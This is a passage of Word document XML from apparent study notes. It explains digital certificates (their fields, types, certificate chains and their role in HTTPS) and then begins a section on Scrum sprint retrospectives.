        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99BD0B" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Organization (O)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The company or entity name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F60F22" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Location Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Details like city, country, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF77C5"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ertificate Authority (CA) Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92BA67"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certificate contains details about the Certificate Authority (CA) that issued the certificate and the CA's signature that validates the authenticity of the certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05C23B"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Expiration Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF92FD8"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Digital certificates have a validity period. After the expiration date, the certificate is no longer valid, and a new one must be issued.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD4636"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erial Number</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B702A"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 unique identifier for the certificate, used to distinguish it from others issued by the same CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BAE07C"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ignature of the CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942DE2C"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CA’s digital signature is used to validate the certificate. The CA signs the certificate to confirm that it is trustworthy and authentic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555211C1"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ublic Key Infrastructure (PKI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487FF5CD"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The certificate is part of a broader </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Public Key Infrastructure (PKI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> system, which ensures that the encryption keys used for communication are legitimate and trustworthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70058765" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Types of Certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F282A4D"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SL/TLS Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB8225"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lastRenderedPageBreak/>
        <w:t>These certificates are used to encrypt data during communication between a server and a client, ensuring privacy and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FECABCA"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ode Signing Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587693B"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Used to sign software or code to verify the authenticity and integrity of the software. This helps prevent tampering or malware injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCD839"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lient Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FC9BE"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Used for client authentication to ensure that only authorized clients can connect to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB38FE"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Wildcard Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956403D"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Used to secure multiple subdomains of a domain, for example, *.example.com would secure www.example.com, mail.example.com, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB52E7"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Extended Validation (EV) Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD85397" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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se provide a higher level of trust by requiring extensive verification of the organization before issuing the certificate. EV certificates typically display the organization name in the browser’s address bar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680BA25E" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Role of a Certificate in HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160DA2D"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When you visit a website that uses HTTPS, the server sends its </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your browser during the SSL/TLS handshake process. The certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9EA4A6"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onfirms that the website you are communicating with is legitimate and not an imposter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F45E7"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ontains the public key necessary to initiate encrypted communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC98157"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Helps ensure that the data exchanged between your browser and the website is secure and cannot be intercepted or tampered with by third parties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73B8F3" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Certificate Chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B3404"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>certificate chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consists of the server's certificate, the intermediate certificates, and the root certificate (trusted by the client or browser). The root certificate is issued by a trusted Certificate Authority (CA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78577350"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certificate chain ensures that the server’s certificate can be traced back to a trusted CA, verifying its authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEFB9A0" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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How Certificates Work in Practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B108D1"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browser connects to a server via HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABFDAA"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The server sends its </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F1E07"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browser verifies the authenticity of the certificate by checking if it was issued by a trusted CA, if it is valid, and if the server matches the certificate’s domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199FCB86"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f the certificate is valid, the browser uses the public key from the certificate to establish an encrypted connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F8EBA"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fter successful verification and encryption setup, data is securely exchanged between the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61232E24" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Importance of Certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADFA3D"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ecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Certificates ensure secure, encrypted communication over the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665C3DD"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Trust</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Certificates issued by trusted CAs establish confidence that the server you are connecting to is genuine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917B69F"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Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the data transmitted between the client and server cannot be tampered with by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5DA97" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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n summary, certificates are essential for secure online communication and for establishing trust between users and websites. They authenticate the identity of the server and enable encryption for privacy and data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F68FB9" w14:textId="42E244EE" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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0B93DF18">
          <v:rect id="_x0000_i3594" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942A254" w14:textId="40F122BB" w:rsidR="002B5B56" w:rsidRPr="00CE4B95" w:rsidRDefault="007109C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="890" w:name="_Toc196308370"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Sprint retrospective</w:t>
      </w:r>
      <w:r w:rsidR="002B5B56" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="890"/>
    </w:p>
    <w:p w14:paraId="31451A78" w14:textId="0276A11A" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sprint Retrospective</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a meeting held at the end of each sprint in Agile (specifically Scrum) to reflect on the work done during the sprint and identify areas for improvement. It’s an essential part of the Scrum process and allows the team to continuously improve their performance and collaboration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431546D5" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Key Aspects of a Sprint Retrospective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B4008" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE446E7" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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main goal is to inspect the sprint process and adapt it for better performance in future sprints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F80D725" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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eams discuss what went well, what didn't go well, and how things can be improved moving forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA8E5E" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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t's a safe environment where team members can openly share feedback without fear of blame.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C48385" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF630DA" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Sprint Retrospective typically happens at the end of a sprint, after the Sprint Review and before the next sprint planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BCE321" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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It is time-boxed to a fixed duration, usually </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1 to 2 hours</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on the sprint length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16622ADA" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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articipants</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12BA12" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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All members of the Scrum Team, including the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Product Owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scrum Master</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Development Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C792C51" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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lastRenderedPageBreak/>
        <w:t>The Scrum Master typically facilitates the retrospective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5E8DA" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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genda</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE2F3B2" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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et the stage</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a comfortable environment for open communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABE148" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Gather data</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collect insights on how the sprint went, using techniques like start/stop/continue, or using data from sprint metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE7D64" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Generate insights</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Identify patterns or trends in what went well and what didn’t.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D5771" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Decide what to do</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Come up with specific, actionable improvements to implement in the next sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61207C77" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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lose</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Summarize the discussion and any action items, and end the meeting with a positive note.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3653C928" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Benefits</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758DAE6" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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ontinuous Improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Teams continuously assess their processes and practices to identify areas for improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D27B74" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Team Collaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It helps foster better communication and teamwork among team members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D6D912" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Increased Productivity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
